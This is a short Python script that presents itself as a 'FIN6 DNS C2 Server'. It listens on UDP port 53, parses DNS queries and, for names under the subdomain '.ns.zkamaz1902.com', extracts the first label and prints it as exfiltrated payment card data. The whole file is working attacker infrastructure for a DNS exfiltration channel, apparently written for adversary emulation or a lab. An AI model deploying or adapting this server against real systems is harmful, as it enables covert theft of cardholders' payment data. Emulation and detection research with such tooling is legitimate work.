import os
import socket
from dnslib import *
import time

# ANSI escape codes for colors
RED = '\033[91m'
DARK_GRAY = '\033[90m'
GREEN = '\033[92m'
BLUE = '\033[94m'
BG_WHITE = '\033[107m'
BG_DARK = '\033[40m'
BG_BLUE = '\033[104m'
BG_GREEN = '\033[48;5;46m'
BOLD = '\033[22m'
RESET = '\033[0m'

# Banner text for "FIN6 C2 Server" Generated BY ChatGPT
banner = f"""
{DARK_GRAY}███████╗██╗███╗   ██╗ ██████╗      ██████╗   ██████╗     
{DARK_GRAY}██╔════╝██║████╗  ██║██╔════╝     ██╔═══██╗ ██╔═══██╗    
{DARK_GRAY}█████╗  ██║██╔██╗ ██║██║  ███╗    ██║   ██║ ██║   ██║    
{RED}██╔══╝  ██║██║╚██╗██║██║   ██║    ██║   ██║ ██║   ██║    
{RED}██║     ██║██║ ╚████║╚██████╔╝    ╚██████╔╝ ╚██████╔╝    
╚═╝     ╚═╝╚═╝  ╚═══╝ ╚═════╝      ╚═════╝   ╚═════╝   C2 Server{RESET}
"""

# Print the banner
print(banner)

# Brief delay to let the banner display before the rest of the script executes
time.sleep(1)

print(f"{BG_DARK}{GREEN}{BOLD}Starting FIN6 DNS C2 Server...{RESET}")


IP = "0.0.0.0"
port = 53
s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)	# create UDP Socket

s.bind((IP,port))


while True:
	data, addr = s.recvfrom(512); 	# recv data
	record = DNSRecord.parse(data);	# parse the dns query
	domain_name = str(record.q.qname)

	print(f"{BLUE}[*]Received DNS request from addr={addr[0]} : {domain_name=}{RESET}")

	# check for the domain then extract the card
	if(domain_name.endswith(".ns.zkamaz1902.com.")):
		card_data = domain_name.split(".")[0]
		print(f"{BG_GREEN}{DARK_GRAY}{BOLD}[+] Exfiltrated card data: {BG_DARK}{RED}{card_data}{RESET}")
	response = record.reply()
	s.sendto(response.pack(),addr)
